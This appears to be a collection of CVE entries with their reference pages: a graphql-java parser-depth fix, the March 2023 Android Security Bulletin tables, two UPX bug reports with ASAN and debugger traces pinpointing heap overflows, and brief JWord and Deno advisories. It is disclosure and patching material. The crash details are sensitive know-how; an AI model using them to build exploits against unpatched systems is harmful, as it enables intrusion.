In GraphQL Java (aka graphql-java) before 20.1, an attacker can send a crafted GraphQL query that causes stack consumption. The fixed versions are 20.1, 19.4, 18.4, 17.5, and 0.0.0-2023-03-20T01-49-44-80e3135.

This puts in a limit on how deep grammar rules can get.

As ANLTR is a **recursive-descent parser** it will build up a call stack as it moves along. This stack is limited and can blow up with just the wrong input. Even if the max tokens checking is in place, it can still blow the JVM stack before the max tokens are reached.

Right now it's 500 deep as presented here. Is this the right value? More?? Less ?? I changed it from 1000

CVE-2023-28867: Preventing stack overflow exceptions via limiting the depth of the parser rules by bbakerman · Pull Request #3112 · graphql-java/graphql-java

In isBluetoothShareUri of BluetoothOppUtility.java, there is a possible incorrect file read due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-225880741

_Published March 6, 2023 | Updated March 8, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-03-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-03-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-03-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege after updating an app to a higher Target SDK with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20906

A-221040577

EoP

High

11, 12, 12L, 13

CVE-2023-20911

A-242537498

EoP

High

11, 12, 12L, 13

CVE-2023-20917

A-242605257 \[2\]

EoP

High

11, 12, 12L, 13

CVE-2023-20947

A-237405974

EoP

High

12, 12L, 13

CVE-2023-20963

A-220302519

EoP

High

11, 12, 12L, 13

CVE-2023-20956

A-240140929

ID

High

12, 12L, 13

CVE-2023-20958

A-254803162

ID

High

13

CVE-2023-20964

A-238177121 \[2\]

DoS

High

12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20951

A-258652631

RCE

Critical

11, 12, 12L, 13

CVE-2023-20954

A-261867748

RCE

Critical

11, 12, 12L, 13

CVE-2023-20926

A-253043058

EoP

High

12, 12L, 13

CVE-2023-20931

A-242535997

EoP

High

11, 12, 12L, 13

CVE-2023-20936

A-226927612

EoP

High

11, 12, 12L, 13

CVE-2023-20953

A-251778420

EoP

High

13

CVE-2023-20955

A-258653813

EoP

High

11, 12, 12L, 13

CVE-2023-20957

A-258422561

EoP

High

11, 12, 12L

CVE-2023-20959

A-249057848

EoP

High

13

CVE-2023-20960

A-250589026 \[2\] \[3\]

EoP

High

12L, 13

CVE-2023-20966

A-242299736

EoP

High

11, 12, 12L, 13

CVE-2022-4452

A-251802307

ID

High

13

CVE-2022-20467

A-225880741

ID

High

11, 12, 12L, 13

CVE-2023-20929

A-234442700

ID

High

13

CVE-2023-20952

A-186803518

ID

High

11, 12, 12L, 13

CVE-2023-20962

A-256590210

ID

High

13

CVE-2022-20499

A-246539931

DoS

High

12, 12L, 13

CVE-2023-20910

A-245299920

DoS

High

11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

Media Codecs

CVE-2023-20956

Permission Controller

CVE-2023-20947

Tethering

CVE-2023-20929

WiFi

CVE-2022-20499, CVE-2023-20910

**2023-03-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-03-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The vulnerability in this section could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2021-33655

A-240019719  
Upstream kernel \[2\] \[3\]

EoP

High

Frame Buffer

**MediaTek components**

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

   

CVE

References

Severity

Subcomponent

CVE-2023-20620

A-264149248  
M-ALPS07554558 \*

High

adsp

CVE-2023-20621

A-264208866  
M-ALPS07664755\*

High

tinysys

CVE-2023-20623

A-264209787  
M-ALPS07559778 \*

High

ion

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

   

CVE

References

Severity

Subcomponent

CVE-2022-47459

A-264598465  
U-2032124 \*

High

Kernel

CVE-2022-47461

A-264834026  
U-2066617 \*

High

system

CVE-2022-47462

A-264834568  
U-2066754 \*

High

system

CVE-2022-47460

A-264831217  
U-2044606 \*

High

Kernel

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2022-22075

A-193434313  
QC-CR#3129138  
QC-CR#3112398 \[2\] \[3\]

High

Display

CVE-2022-40537

A-261468700  
QC-CR#3278869 \[2\] \[3\] \[4\]

High

Bluetooth

CVE-2022-40540

A-261470730  
QC-CR#3280498

High

Kernel

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2022-33213

A-238106224 \*

Critical

Closed-source component

CVE-2022-33256

A-245402790 \*

Critical

Closed-source component

CVE-2022-25655

A-261469326 \*

High

Closed-source component

CVE-2022-25694

A-235102547 \*

High

Closed-source component

CVE-2022-25705

A-235102507 \*

High

Closed-source component

CVE-2022-25709

A-235102420 \*

High

Closed-source component

CVE-2022-33242

A-245402503 \*

High

Closed-source component

CVE-2022-33244

A-245402728 \*

High

Closed-source component

CVE-2022-33250

A-245403450 \*

High

Closed-source component

CVE-2022-33254

A-245403473 \*

High

Closed-source component

CVE-2022-33272

A-245403311 \*

High

Closed-source component

CVE-2022-33278  

A-245402730 \*

High

Closed-source component

CVE-2022-33309

A-261468683 \*

High

Closed-source component

CVE-2022-40515

A-261469638 \*

High

Closed-source component

CVE-2022-40527

A-261470448 \*

High

Closed-source component

CVE-2022-40530

A-261471028 \*

High

Closed-source component

CVE-2022-40531

A-261469091 \*

High

Closed-source component

CVE-2022-40535

A-261470732 \*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-03-01 or later address all issues associated with the 2023-03-01 security patch level.
*   Security patch levels of 2023-03-05 or later address all issues associated with the 2023-03-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-03-01\]
*   \[ro.build.version.security\_patch\]:\[2023-03-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-03-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-03-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-03-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

March 6, 2023

Bulletin Published

1.1

March 8, 2023

Bulletin revised to include AOSP links

CVE-2022-20467: Android Security Bulletin—March 2023

A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le32(). The problem is essentially caused in PackLinuxElf32::elf_lookup() at p_lx_elf.cpp:5382.

**What's the problem (or question)?**

Multi heap-based buffer overflows were discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get\_le32(). The issue can be triggered by different places, which can cause a denial of service. The issue is diff from issue365

ASAN reports:

\==112024==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001f3b1 at pc 0x0000005292cb bp 0x7fffc3995640 sp 0x7fffc3995630
READ of size 4 at 0x61d00001f3b1 thread T0
    #0 0x5292ca in get\_le32(void const\*) /home/test/Desktop/EVAULATION/upx/src/bele.h:164
    #1 0x5292ca in N\_BELE\_RTP::LEPolicy::get32(void const\*) const /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:192
    #2 0x4589c1 in Packer::get\_te32(void const\*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:296
    #3 0x4589c1 in PackLinuxElf32::elf\_lookup(char const\*) const /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5382
    #4 0x463d30 in PackLinuxElf32::PackLinuxElf32help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:315
    #5 0x464e96 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:395
    #6 0x464e96 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4800
    #7 0x464e96 in PackBSDElf32x86::PackBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4817
    #8 0x464e96 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:4828
    #9 0x4f337a in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:190
    #10 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #11 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #12 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #13 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #14 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #15 0x7efc08e6182f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #16 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

0x61d00001f3b1 is located 189 bytes to the right of 2164-byte region \[0x61d00001ea80,0x61d00001f2f4)
allocated by thread T0 here:
    #0 0x7efc09a55602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42732a in MemBuffer::alloc(unsigned long long) /home/test/Desktop/EVAULATION/upx/src/mem.cpp:194

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/EVAULATION/upx/src/bele.h:164 get\_le32(void const\*)
Shadow bytes around the buggy address:
  0x0c3a7fffbe20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3a7fffbe50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 fa
  0x0c3a7fffbe60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c3a7fffbe70: fa fa fa fa fa fa\[fa\]fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbe80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbe90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbeb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3a7fffbec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==112024\==ABORTING

Debug

Program received signal SIGSEGV, Segmentation fault.
0x000000000066f8f8 in get\_le32 (p=0xa1fffd) at bele.h:164
164        return ACC\_UA\_GET\_LE32(p);
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0xa7ce93          
$rcx   : 0x2               
$rdx   : 0xae              
$rsp   : 0x00007fffffffcc18  →  0x000000000051249b  →  <PackLinuxElf32::elf\_lookup(char+0> xor eax, ebp
$rbp   : 0x8e8223e2        
$rsi   : 0x0000000000a1fffd  →  0x0000000000a1fffd
$rdi   : 0x00000000009ed3c0  →  0x00000000007cd9c0  →  0x000000000066fe00  →  <N\_BELE\_RTP::LEPolicy::~LEPolicy()+0> lea rsp, \[rsp-0x98\]
$rip   : 0x000000000066f8f8  →  <N\_BELE\_RTP::LEPolicy::get32(void+0> mov eax, DWORD PTR \[rsi\]
$r8    : 0x1f              
$r9    : 0x3fdf            
$r10   : 0xae              
$r11   : 0x1d9577c0        
$r12   : 0x0000000000a00030  →  0x00000000007267a0  →  <vtable+0> add BYTE PTR \[rax\], al
$r13   : 0x0000000000a1fffd  →  0x0000000000a1fffd
$r14   : 0x0000000000a00a51  →  0x0000000000000000
$r15   : 0x00000000007cd9c0  →  0x000000000066fe00  →  <N\_BELE\_RTP::LEPolicy::~LEPolicy()+0> lea rsp, \[rsp-0x98\]
$eflags: \[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffcc18│+0x0000: 0x000000000051249b  →  <PackLinuxElf32::elf\_lookup(char+0> xor eax, ebp     ← $rsp
0x00007fffffffcc20│+0x0008: 0x00000000006cdffe  →  "JNI\_OnLoad"
0x00007fffffffcc28│+0x0010: 0x0000000200000000
0x00007fffffffcc30│+0x0018: 0x000000000900457f
0x00007fffffffcc38│+0x0020: 0x0000000000000068 ("h"?)
0x00007fffffffcc40│+0x0028: 0x0000000000000000
0x00007fffffffcc48│+0x0030: 0x0000000000070000
0x00007fffffffcc50│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x66f8e7 <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    rcx, QWORD PTR \[rsp+0x8\]
     0x66f8ec <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    rdx, QWORD PTR \[rsp\]
     0x66f8f0 <N\_BELE\_RTP::LEPolicy::get32(void+0> lea    rsp, \[rsp+0x98\]
 →   0x66f8f8 <N\_BELE\_RTP::LEPolicy::get32(void+0> mov    eax, DWORD PTR \[rsi\]
     0x66f8fa <N\_BELE\_RTP::LEPolicy::get32(void+0> ret    
     0x66f8fb                  nop    DWORD PTR \[rax+rax\*1+0x0\]
     0x66f900 <N\_BELE\_RTP::LEPolicy::get64(void+0> lea    rsp, \[rsp-0x98\]
     0x66f908 <N\_BELE\_RTP::LEPolicy::get64(void+0> mov    QWORD PTR \[rsp\], rdx
     0x66f90c <N\_BELE\_RTP::LEPolicy::get64(void+0> mov    QWORD PTR \[rsp+0x8\], rcx
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:bele.h+164 ────
    159     }
    160     
    161     inline unsigned get\_le32(const void \*p)
    162     {
    163     #if defined(ACC\_UA\_GET\_LE32)
 →  164         return ACC\_UA\_GET\_LE32(p);
    165     #else
    166         return acc\_ua\_get\_le32(p);
    167     #endif
    168     }
    169     
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "upx.out", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x66f8f8 → get\_le32(p=0xa1fffd)
\[#1\] 0x66f8f8 → N\_BELE\_RTP::LEPolicy::get32(this=0x9ed3c0 <N\_BELE\_RTP::le\_policy>, p=0xa1fffd)
\[#2\] 0x51249b → Packer::get\_te32(this=0xa00030, p=0xa1fffd)
\[#3\] 0x51249b → PackLinuxElf32::elf\_lookup(this=0xa00030, name=0x6cdffe "JNI\_OnLoad")
\[#4\] 0x529509 → PackLinuxElf32::PackLinuxElf32help1(this=0xa00030, f=0x7fffffffce10)
\[#5\] 0x52c65e → PackLinuxElf32Le::PackLinuxElf32Le(f=0x7fffffffce10, this=0xa00030)
\[#6\] 0x52c65e → PackLinuxElf32x86::PackLinuxElf32x86(f=0x7fffffffce10, this=0xa00030)
\[#7\] 0x52c65e → PackBSDElf32x86::PackBSDElf32x86(f=0x7fffffffce10, this=0xa00030)
\[#8\] 0x52c65e → PackFreeBSDElf32x86::PackFreeBSDElf32x86(this=0xa00030, f=0x7fffffffce10)
\[#9\] 0x60448c → PackMaster::visitAllPackers(func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10)
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  bt
#0  0x000000000066f8f8 in get\_le32 (p=0xa1fffd) at bele.h:164
#1  N\_BELE\_RTP::LEPolicy::get32 (this=0x9ed3c0 <N\_BELE\_RTP::le\_policy>, p=0xa1fffd) at bele\_policy.h:192
#2  0x000000000051249b in Packer::get\_te32 (this=0xa00030, p=0xa1fffd) at packer.h:296
#3  PackLinuxElf32::elf\_lookup (this=0xa00030, name=0x6cdffe "JNI\_OnLoad") at p\_lx\_elf.cpp:5382
#4  0x0000000000529509 in PackLinuxElf32::PackLinuxElf32help1 (this=this@entry=0xa00030, f=f@entry=0x7fffffffce10) at p\_lx\_elf.cpp:315
#5  0x000000000052c65e in PackLinuxElf32Le::PackLinuxElf32Le (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.h:395
#6  PackLinuxElf32x86::PackLinuxElf32x86 (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.cpp:4800
#7  PackBSDElf32x86::PackBSDElf32x86 (f=0x7fffffffce10, this=0xa00030) at p\_lx\_elf.cpp:4817
#8  PackFreeBSDElf32x86::PackFreeBSDElf32x86 (this=0xa00030, f=0x7fffffffce10) at p\_lx\_elf.cpp:4828
#9  0x000000000060448c in PackMaster::visitAllPackers (func=0x602c30 <try\_unpack(Packer\*, void\*)>, f=0x7fffffffce10, o=0x7fffffffcfc8, user=0x7fffffffce10) at packmast.cpp:190
#10 0x00000000006072ca in PackMaster::getUnpacker (f=<optimized out>) at packmast.cpp:248
#11 PackMaster::unpack (this=0x7fffffffcfb0, fo=0x7fffffffcee0) at packmast.cpp:266
#12 0x0000000000670dc5 in do\_one\_file (iname=iname@entry=0x7fffffffdf15 "id:000089,sig:11,src:001286,op:MOpt-core-havoc,rep:2", oname=oname@entry=0x7fffffffd550 "/dev/null") at work.cpp:160
#13 0x000000000067157c in do\_files (i=i@entry=0x4, argc=0x5, argv=0x7fffffffdac8) at work.cpp:271
#14 0x00000000004056a1 in main (argc=0x5, argv=0x7fffffffdac8) at main.cpp:1538

Deferencing a generic poniter 'p' trigger the overflow.

gef➤  p \*p
Attempt to dereference a generic pointer.
gef➤  p p
$1 = (const void \*) 0xa1fffd

Essentially, the problem is caused in PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5382

do if (0\==((h ^ get\_te32(hp))>>1)) {
    unsigned st\_name = get\_te32(&dsp->st\_name);
    char const \*const p = get\_str\_name(st\_name, (unsigned)-1);
    if (0\==strcmp(name, p)) {
        return dsp;
    }
} while (++dsp, 0\==(1u& get\_te32(hp++)));

Several locations will also trigger vulnerabilities:  
PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5368

unsigned const w = get\_te32(&bitmask\[(n\_bitmask -1) & (h>>5)\]);

PackLinuxElf64::elf\_lookup() at p\_lx\_elf.cpp:5404

for (si= get\_te32(&buckets\[m\]); 0!=si; si= get\_te32(&chains\[si\]))

PackLinuxElf32::elf\_lookup() at p\_lx\_elf.cpp:5349

for (si= get\_te32(&buckets\[m\]); 0!=si; si= get\_te32(&chains\[si\])) {
            char const \*const p= get\_dynsym\_name(si, (unsigned)-1);
            if (0\==strcmp(name, p)) {
                return &dynsym\[si\];
            }
        }

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

We are very grateful to @jreiser for patching the bucket in p\_lx\_elf.cpp in the issue 365. However, in fact, all places involving get\_te32 () should be strengthened in upx, especially in p\_lx\_elf.cpp. The four positions we reported should be patched at least:

1.  p\_lx\_elf.cpp:5382
2.  p\_lx\_elf.cpp:5368
3.  p\_lx\_elf.cpp:5404
4.  p\_lx\_elf.cpp:5349

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

p\_lx\_elf.cpp:5382  
Poc can be found here.

p\_lx\_elf.cpp:5368  
Poc can be found here.

p\_lx\_elf.cpp:5404  
Poc can be found here.

p\_lx\_elf.cpp:5349  
Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43311: [bug] multi heap buffer overflows in get_le32() · Issue #380 · upx/upx

A heap-based buffer overflow was discovered in upx, during the generic pointer 'p' points to an inaccessible address in func get_le64().

**What's the problem (or question)?**

A heap-based buffer overflow was discovered in upx, during the genric pointer 'p' points to an inaccessible address in func get\_le64(). The issue can cause a denial of service. The issue is diff from issue367 and issue368

ASAN reports:

ASAN:SIGSEGV
=================================================================
==113201==ERROR: AddressSanitizer: SEGV on unknown address 0x630011d04b20 (pc 0x0000005292e0 bp 0x000000000022 sp 0x7ffebc640bc8 T0)
    #0 0x5292df in get\_le64(void const\*) /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:193
    #1 0x5292df in N\_BELE\_RTP::LEPolicy::get64(void const\*) const /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:194
    #2 0x45784b in Packer::get\_te64(void const\*) const /home/test/Desktop/EVAULATION/upx/src/packer.h:297
    #3 0x45784b in PackLinuxElf64::elf\_lookup(char const\*) const /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:5423
    #4 0x46f7eb in PackLinuxElf64::PackLinuxElf64help1(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:805
    #5 0x470479 in PackLinuxElf64Le::PackLinuxElf64Le(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.h:407
    #6 0x470479 in PackLinuxElf64amd::PackLinuxElf64amd(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/p\_lx\_elf.cpp:1008
    #7 0x4f34b2 in PackMaster::visitAllPackers(Packer\* (\*)(Packer\*, void\*), InputFile\*, options\_t const\*, void\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:194
    #8 0x4f50f9 in PackMaster::getUnpacker(InputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:248
    #9 0x4f521f in PackMaster::unpack(OutputFile\*) /home/test/Desktop/EVAULATION/upx/src/packmast.cpp:266
    #10 0x52a1e6 in do\_one\_file(char const\*, char\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:160
    #11 0x52a69e in do\_files(int, int, char\*\*) /home/test/Desktop/EVAULATION/upx/src/work.cpp:271
    #12 0x403ace in main /home/test/Desktop/EVAULATION/upx/src/main.cpp:1538
    #13 0x7fc4129b682f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #14 0x404828 in \_start (/home/test/Desktop/EVAULATION/upx/src/upx.out+0x404828)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/Desktop/EVAULATION/upx/src/bele\_policy.h:193 get\_le64(void const\*)
==113201==ABORTING

The essential cause of the bug is at PackLinuxElf64 :: elf\_lookup () at p\_lx\_elf: 5423:

upx\_uint64\_t const w = get\_te64(&bitmask\[(n\_bitmask -1) & (h>>6)\]);

**What should have happened?**

Decompress a crafted/suspicious file.

**Do you have an idea for a solution?**

We are very grateful to @jreiser for patching the bucket in p\_lx\_elf.cpp in the issue 367. However, in fact, all places involving get\_te64 () should be strengthened in upx, especially in p\_lx\_elf.cpp. The position we reported should be patched at least:  
position in PackLinuxElf64::elf\_lookup() at p\_lx\_elf:5423

upx\_uint64\_t const w = get\_te64(&bitmask\[(n\_bitmask -1) & (h>>6)\]);

**How can we reproduce the issue?**

1.  compile upx with address-sanitize
2.  execute cmd

upx.out -df $PoC -o /dev/null

Poc can be found here.

**Please tell us details about your environment.**

*   UPX version used (upx --version):

upx 4.0.0-git-c6b9e3c62d15 (latest-devel-branch)
UCL data compression library 1.03
zlib data compression library 1.2.8
LZMA SDK version 4.43

*   Host Operating System and version:  
    Ubuntu 16.04 64-bit
*   Host CPU architecture:  
    Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz with 8GB
*   Target Operating System and version:  
    same as Host
*   Target CPU architecture:  
    same as Host

CVE-2021-43316: [bug] segv fault in get_le64() · Issue #381 · upx/upx

An issue was discovered in Independentsoft JSpreadsheet before 1.1.110. The API is prone to XML external entity (XXE) injection via a remote DTD in a DOCX file.

**Tutorial**

Java examples

**Evaluation version (version 1.0)**

Download 30 days evaluation version

**Need help? Ask our developers:**

Name\* Email\* Message\*

CVE-2023-28151: JWord - Java Word API

Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text. This works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run. This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). This issue has been patched in version 1.31.2.

